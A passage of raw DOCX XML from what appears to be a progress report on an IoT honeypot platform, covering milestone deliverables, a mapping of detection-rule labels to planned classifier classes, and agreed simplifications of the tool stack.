            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware capture over HTTP, SSH stdin/scp, the fake shell and MQTT; read-only quarantine; ELF architecture; YARA rule set for IoT families; MALWARE_FAMILY detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware page; Figure 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">STIX 2.1 export validated with the OASIS stix2 library; JSON and PDF threat reports; daily and weekly report e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Reports &amp; Alerts page; Figure 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">React 19 + TypeScript dashboard with eleven pages, offline world map, session replay and WebSocket live push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Section 7.3; Figure 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MALWARE_FAMILY alerts; PDF attachments for report e-mails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert log; Figure 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Automatic firewall service, generated bcrypt password, schema auto-migration, SHA-256-verified backups, Prometheus/Grafana monitoring profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Figures 15 and 16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Labelled per-session feature dataset (WBS 10.1), exported as CSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/ml/dataset.csv; Figure 17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 8 has started at this milestone with its training data. Each detection rule emits a label that maps onto one of the six planned classifier classes, and ml/features.py applies this mapping to every session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Rule Labels Prepared as Training Classes for Module 8</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9738" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="4784"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="018CBFC3" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Planned ML class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Rule detections that produce the label</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute-force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BRUTE_FORCE, CREDENTIAL_STUFFING, CREDENTIAL_COMPROMISE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malware delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MALWARE_DELIVERY, MALWARE_FAMILY, MIRAI_SIGNATURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Botnet C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BOTNET_C2, ICS_UNAUTHORIZED_COMMAND, DENIAL_OF_VIEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Port / service scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RECONNAISSANCE, WEB_SCAN, RTSP_ROUTE_ENUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protocol exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PROTOCOL_EXPLOIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Normal / benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sessions that match none of the above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9003" w:name="_Toc69003"/>
      <w:r>
        <w:t xml:space="preserve">1.8 Agreed Scope Simplifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9003"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some heavy tools in the scope document were replaced by lighter equivalents that keep each objective. These simplifications are subject to supervisor approval:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Scope Promises and Implemented Equivalents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00"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="4080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w14:paraId="00A38001" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope promise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Built instead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">React 18 + TypeScript + Next.js dashboard (shadcn, Zustand)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">React 19 + TypeScript single-page app (TanStack Router and Query, Tailwind, Recharts) built into the Nginx image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Same user experience; static files behind Nginx, so no Node.js server has to be secured.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaflet.js map with a tile server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">d3-geo SVG world map with a bundled atlas and heat layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Works offline on an isolated honeynet and under a strict Content-Security-Policy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Socket.IO live updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Native WebSocket (FastAPI) relaying Redis publish/subscribe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No extra dependency; same push behaviour.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP with a real GStreamer H.264 stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP signalling, authentication capture and a valid H.264 SDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers brute-force RTSP authentication; video content is secondary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Kubernetes (K3s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Single-host research deployment (scope limitation LI-11).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Celery job queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Background worker loop (intel engine, every 30 s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Low event volume.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Slack + Telegram + e-mail alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Telegram + e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Two channels prove the design.</w:t>
